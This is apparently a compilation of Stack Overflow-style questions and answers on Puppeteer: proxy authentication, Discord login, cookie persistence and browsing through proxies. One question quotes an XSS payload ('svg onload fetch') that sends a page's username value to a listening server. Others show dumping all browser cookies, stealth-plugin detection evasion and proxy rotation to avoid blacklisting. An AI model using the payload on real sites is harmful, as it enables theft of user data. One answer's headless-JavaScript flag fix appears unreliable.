Puppeteer not loading page - Node.js

Here is a simple Puppeteer program:
const puppeteer = require('puppeteer');

async function run() {
  // Launch a visible browser that routes traffic through the proxy
  const browser = await puppeteer.launch({
    headless: false,
    args: ['--proxy-server=104.233.50.38:3199']
  });
  const page = await browser.newPage();
  // Supply the proxy credentials
  await page.authenticate({
    username: 'myusername',
    password: 'mypassword'
  });
  await page.goto('https://google.com');
}

run();
Note: I have tried this with over 10 proxies and none of them work in Puppeteer. The credentials are exactly what was provided to me; I have checked them multiple times.
This is what I get (screenshots of the page and its console not included):
Why is this happening? I checked the addresses, username, and password multiple times, and there is no other error message except this.
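When the proxy connection fails, page.goto usually rejects with the underlying Chromium network error (for example net::ERR_TUNNEL_CONNECTION_FAILED). A minimal debugging sketch for surfacing that error, assuming the same proxy and credentials as above:
const puppeteer = require('puppeteer');

async function run() {
  const browser = await puppeteer.launch({
    headless: false,
    args: ['--proxy-server=104.233.50.38:3199']
  });
  const page = await browser.newPage();
  await page.authenticate({ username: 'myusername', password: 'mypassword' });

  // Log every request Chromium fails to complete, with its error text
  page.on('requestfailed', req => {
    console.log('request failed:', req.url(), req.failure().errorText);
  });

  try {
    await page.goto('https://google.com');
  } catch (err) {
    // A broken proxy typically surfaces here as a net:: error,
    // e.g. ERR_PROXY_CONNECTION_FAILED or ERR_TUNNEL_CONNECTION_FAILED
    console.error('navigation failed:', err.message);
  } finally {
    await browser.close();
  }
}

run();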

It seems that page.authenticate is not working for me either; instead, you can use page.setExtraHTTPHeaders:
const puppeteer = require('puppeteer');

async function run() {
  const browser = await puppeteer.launch({
    ignoreHTTPSErrors: true,
    args: ['--proxy-server=104.233.50.38:3199']
  });
  const page = await browser.newPage();
  // Send the proxy credentials as a Proxy-Authorization header instead
  await page.setExtraHTTPHeaders({
    'Proxy-Authorization': 'Basic ' + Buffer.from('username:password').toString('base64')
  });
  await page.goto('https://google.com');
}

run();

You can use puppeteer-page-proxy; it handles username and password authentication easily and supports http, https, socks4, and socks5 proxies. https://github.com/Cuadrix/puppeteer-page-proxy
You can define the proxy this way:
const proxy = 'http://login:pass@IP:Port';
or
const proxy = 'socks5://IP:Port';
Then you can use it per request:
const useProxy = require('puppeteer-page-proxy');

// Route every intercepted request through the proxy
await page.setRequestInterception(true);
page.on('request', req => {
  useProxy(req, proxy);
});
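If you would rather set the proxy once for the whole page instead of per request, puppeteer-page-proxy also accepts a page object. A minimal sketch, assuming the same proxy string as above:
const puppeteer = require('puppeteer');
const useProxy = require('puppeteer-page-proxy');

(async () => {
  const browser = await puppeteer.launch({ headless: false });
  const page = await browser.newPage();

  // Apply the proxy to every request made by this page
  await useProxy(page, 'http://login:pass@IP:Port');

  await page.goto('https://google.com');
  await browser.close();
})();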

Related

Why Discord site isn't loaded with Puppeteer Node.js

await page.goto('https://discord.com/channels/850682587273625661/919026857926590535', { waitUntil: 'networkidle0', timeout: 0 });
await page.screenshot({ path: 'discor.png' })
The main idea here is that if I use puppeteer.launch() the site loads, whereas if I use puppeteer.connect() it looks as if Discord blocks my script. Are there any ways to bypass this restriction of Discord?
This URL redirects you to a login page, so you'd then have to actually log in as you would do manually:
await page.goto('https://discord.com/channels/850682587273625661/919026857926590535');
// enter email
const emailtarget = await page.waitForSelector("input[name=email]", {visible: true});
await emailtarget.type("my@email.com");
// enter password
const passtarget = await page.waitForSelector("input[name=password]", {visible: true});
await passtarget.type("mySecretPass");
// submit
const submitBtn = await page.waitForSelector("button[type=submit]", {visible: true});
await submitBtn.click();
// wait for redirection
await page.waitForNavigation();
// should be logged in, take screenshot
await page.screenshot({ path: 'discor.png' });

Node JS Puppeteer throws error at url with proxy

I'm making an automation script for filling in an online form with Puppeteer, and to avoid getting IPs blacklisted I decided to use a proxy for each request. This is the part which gives me the error:
console.log(`profile ${ii} started`)
let proxy = await proxy_rotation(proxy_data, ii);
console.log("using proxy: ", proxy);
let exec_path = path.resolve(path.dirname(process.execPath) + "/node_modules/puppeteer/.local-chromium/win64-869685/chrome-win/chrome.exe")
const browser = await puppeteer.launch({
executablePath: exec_path,
args: ['--disable-web-security']
});
const page = await browser.newPage();
console.log("1");
await page.setRequestInterception(true);
await useProxy(page, proxy);
console.log("2");
await page.goto(data[ii][0]); //this is where the error gets thrown
The part below never gets to run when using a proxy; without the proxy, it runs smoothly:
console.log("3");
await page.type("#name", data[ii][1]);
await page.type("#yourEmail", data[ii][2]);
await page.type("#phone", data[ii][3]);
await page.type("#street", data[ii][4]);
await page.type("#city", data[ii][5]);
await page.type("#psc", data[ii][6]);
await page.select('select#state', data[ii][7]);
await page.select('select#prefered_size_sel', data[ii][8]);
await page.$eval('input[name="agreed_personal_info_tiny_contact_form"]', check => check.checked = true);
await page.evaluate(() => {
document.querySelector('input[name="agreed_personal_info_tiny_contact_form"]').click();
});
I just console logged a few numbers to debug where the script is getting stuck. I also tested the proxy and the website I'm trying to access, both with a proxy tester and manually, and had no problem reaching it, but when I run my script I get an error from page.goto (error output not included).
I understand it pretty much says it cannot access the URL, but there should be no reason for that. Do I need to change the way I'm accessing the URL when using a proxy? Or add some extra args to the browser? Can I get a more specific error message somehow? Thanks for any suggestions.
Also, this is the Puppeteer function that throws the error:
async function navigate(client, url, referrer, frameId) {
  try {
    const response = await client.send('Page.navigate', {
      url,
      referrer,
      frameId,
    });
    ensureNewDocumentNavigation = !!response.loaderId;
    return response.errorText
      ? new Error(`${response.errorText} at ${url}`)
      : null;
  }
  catch (error) {
    return error;
  }
}
That error indicates that something is off with how you are using your proxy. Is useProxy your own function or the one from puppeteer-page-proxy? You mention setting the proxy per request, but it seems you are setting it for the whole page; is that intentional? The way your proxy is formatted also seems off: check how I do it below.
You can try launching the browser with your proxy server and using page.authenticate() to handle auth. Like this:
let proxy = await proxy_rotation(proxy_data, ii);
// Expecting the raw proxy string in host:port:username:password form
const [host, port, username, password] = proxy.split(':');
const parsedProxy = new URL(`http://${username}:${password}@${host}:${port}`);
const browser = await puppeteer.launch({
  executablePath: exec_path,
  args: ['--disable-web-security', '--ignore-certificate-errors', `--proxy-server=${parsedProxy.host}`]
});
const page = await browser.newPage();
await page.authenticate({
  username: parsedProxy.username,
  password: parsedProxy.password,
});
Before doing that, I would change what you pass to useProxy so that it looks like http://username:pw@host:port (the same host:port:username:password split shown in the first lines above), as sketched below.
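A minimal sketch of that reformatting, assuming proxy_rotation returns a host:port:username:password string as in the question:
let proxy = await proxy_rotation(proxy_data, ii);
const [host, port, username, password] = proxy.split(':');

// Rebuild the proxy string in the scheme://user:pass@host:port form
// that puppeteer-page-proxy expects
const formattedProxy = `http://${username}:${password}@${host}:${port}`;

await page.setRequestInterception(true);
await useProxy(page, formattedProxy);
await page.goto(data[ii][0]);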

Puppeteer javascript on page won't execute when running on headless mode

I have a page (secretpage.php) containing JavaScript in the HTTP response which sends the value of the userName parameter to my server.
<svg/onload=fetch('http://localhost:8080/username='+document.getElementById("userName").innerHTML)>
In non-headless mode, the JavaScript executed successfully and I got a callback on my local server with the value of "userName" sent back.
However, in headless mode the JavaScript did not execute at all, which is quite puzzling.
I have attached my js file (test.js) below for reference; it is run with:
node test.js
const puppeteer = require('puppeteer');

(async () => {
  //const browser = await puppeteer.launch({ headless: false });
  const browser = await puppeteer.launch();
  const page = await browser.newPage();
  await page.goto('http://localhost/forum/');
  await page.type("#lbluserName", "john", { delay: 100 });
  await page.type("#lblpassword", "password", { delay: 100 });
  await page.click("#btnLogin");
  //await page.waitForNavigation();
  await page.waitFor(5000);
  await page.setViewport({
    width: 1280,
    height: 800,
    deviceScaleFactor: 1,
  });
  await page.goto('http://localhost/forum/pages/secretpage.php');
  await page.waitForSelector('#comments');
  await page.screenshot({ path: 'screenshot.png' });
  await browser.close();
})();
Could anyone please help with troubleshooting this as this is rather peculiar?
Thank you!
I think you need to run Chrome with this JavaScript feature enabled in headless mode:
await puppeteer.launch({
  args: [
    '--enable-features=ExperimentalJavaScript'
  ]
})
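If that flag does not change anything, it can help to see what the page itself is doing in headless mode. A minimal debugging sketch, assuming the same local forum URL as in the question, that forwards the page's console output, script errors, and failed requests to the Node process:
const puppeteer = require('puppeteer');

(async () => {
  const browser = await puppeteer.launch(); // headless by default
  const page = await browser.newPage();

  // Surface anything the page logs or throws, plus requests that never complete,
  // to see whether the inline <svg onload=fetch(...)> handler actually fires
  page.on('console', msg => console.log('page console:', msg.text()));
  page.on('pageerror', err => console.log('page error:', err.message));
  page.on('requestfailed', req =>
    console.log('request failed:', req.url(), req.failure().errorText));

  await page.goto('http://localhost/forum/pages/secretpage.php');
  await browser.close();
})();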

Why chrome can't remember previous session with puppeteer?

I'm trying to use Puppeteer for scraping and I need to use my current Chrome so that I keep all my credentials. However, Chrome can't remember the previous session and I have to click the login button every time, even though it does remember the saved credentials. Is there a way to make this work?
I'm actually using:
Node v12.16.1
chrome 80.0.3987.132 (Official Build) (64-bit) (cohort: Stable)
puppeteer-core 2.1.0 // see: https://github.com/puppeteer/puppeteer/blob/v2.1.0/docs/api.md
test.js:
const pptr = require('puppeteer-core');
(async () => {
  const browser = await pptr.launch({
    executablePath: 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', // path to your chrome
    headless: false,
    args: [
      '--user-data-dir=D:/Users/xxx/AppData/Local/Google/Chrome/User Data2',
    ]
  });
  const page = await browser.newPage();
  await page.goto('https://hostloc.com');
  await page.screenshot({path: 'example.png'});
  await page.waitFor(10000);
  await browser.close();
})();
You should use cookies so that you can restore the previous session data from them; see the page.setCookie documentation in Puppeteer.
Below is an example of how to set a cookie in Puppeteer. It sets the "login_email" property in a PayPal cookie so the login screen is pre-filled with an email address.
const cookie = {
  name: 'login_email',
  value: 'set_by_cookie@domain.com',
  domain: '.paypal.com',
  url: 'https://www.paypal.com/',
  path: '/',
  httpOnly: true,
  secure: true
}
const puppeteer = require('puppeteer');
(async () => {
  const browser = await puppeteer.launch()
  const page = await browser.newPage()
  await page.setCookie(cookie)
  await page.goto('https://www.paypal.com/signin')
  await page.screenshot({ path: 'paypal_login.png' })
  await browser.close()
})()
To get the cookies, you can create a Chrome DevTools Protocol session on the page target using target.createCDPSession() and then send Network.getAllCookies to obtain a list of all browser cookies.
The page.cookies() function only returns cookies for the current URL, so we can filter the current page's cookies out of all the browser cookies to obtain a list of third-party cookies only.
const client = await page.target().createCDPSession();
const all_browser_cookies = (await client.send('Network.getAllCookies')).cookies;
const current_url_cookies = await page.cookies();
const third_party_cookies = all_browser_cookies.filter(cookie => cookie.domain !== current_url_cookies[0].domain);
console.log(all_browser_cookies); // All Browser Cookies
console.log(current_url_cookies); // Current URL Cookies
console.log(third_party_cookies); // Third-Party Cookies
For example, to get all of the cookies:
const puppeteer = require('puppeteer');
(async () => {
  const browser = await puppeteer.launch({});
  const page = await browser.newPage();
  await page.goto('https://stackoverflow.com', { waitUntil: 'networkidle2' });
  // Here we can get all of the cookies
  console.log(await page._client.send('Network.getAllCookies'));
})();
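To actually carry a session across runs, one approach is to dump page.cookies() to a file at the end of one run and feed it back to page.setCookie() at the start of the next. A minimal sketch, assuming the cookies from a logged-in run are enough to restore the session (the cookies.json path is just an example):
const fs = require('fs');
const puppeteer = require('puppeteer');

const COOKIE_FILE = 'cookies.json';

(async () => {
  const browser = await puppeteer.launch({ headless: false });
  const page = await browser.newPage();

  // Restore cookies from a previous run, if any were saved
  if (fs.existsSync(COOKIE_FILE)) {
    const cookies = JSON.parse(fs.readFileSync(COOKIE_FILE, 'utf8'));
    await page.setCookie(...cookies);
  }

  await page.goto('https://hostloc.com');

  // Save the current cookies for the next run
  fs.writeFileSync(COOKIE_FILE, JSON.stringify(await page.cookies(), null, 2));
  await browser.close();
})();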
I hope this will help you.

Puppeteer - How to browse google.com with proxies?

I am trying to browse google.com with puppeteer using proxies but Chromium seems to block me.
Code example:
const puppeteer = require('puppeteer');
(async () => {
  const proxyUrl = 'http://gate.smartproxy.com:7000';
  const username = 'xxxxx';
  const password = 'xxxxx';
  const browser = await puppeteer.launch({
    args: [`--proxy-server=${proxyUrl}`],
    headless: false,
  });
  const page = await browser.newPage();
  await page.authenticate({ username, password });
  await page.goto('https://google.com/');
  const html = await page.$eval('body', e => e.innerHTML);
  console.log(html);
  await browser.close();
})();
Error:
(node:6673) UnhandledPromiseRejectionWarning: Error: net::ERR_TUNNEL_CONNECTION_FAILED at https://google.com/...
I already checked on the proxy side and they are working.
If it's not possible with puppeteer (since they are using Chromium), do you have any alternative ideas on how to browse Google with proxies?
Thanks,
Try replacing https with http, and consult the proxy service to see what documentation they have or what advice they can offer. Alternatively, find out what kind of proxy it is and how it normally behaves, and give us more info.
Try using pluginProxy (puppeteer-extra-plugin-proxy):
const puppeteer = require('puppeteer-extra');
const StealthPlugin = require('puppeteer-extra-plugin-stealth');
const pluginProxy = require('puppeteer-extra-plugin-proxy');
(async () => {
  puppeteer.use(StealthPlugin()); // Recommended
  puppeteer.use(pluginProxy({
    address: <proxy-host>,
    port: <proxy-port>,
    credentials: {
      username: <proxy-user>,
      password: <proxy-pwd>,
    }
  }));
  let browser = await puppeteer.launch({
    headless: false,
    ignoreHTTPSErrors: true // Some proxies need it
  });
  let page = await browser.newPage();
  await page.goto('https://google.com/');
  const html = await page.$eval('body', e => e.innerHTML);
  console.log(html);
  await browser.close();
})();
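For the setup in the question, the plugin configuration would look roughly like this (a sketch, assuming the same gate.smartproxy.com endpoint and the placeholder credentials from the question):
puppeteer.use(pluginProxy({
  address: 'gate.smartproxy.com',
  port: 7000,
  credentials: {
    username: 'xxxxx',
    password: 'xxxxx',
  }
}));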
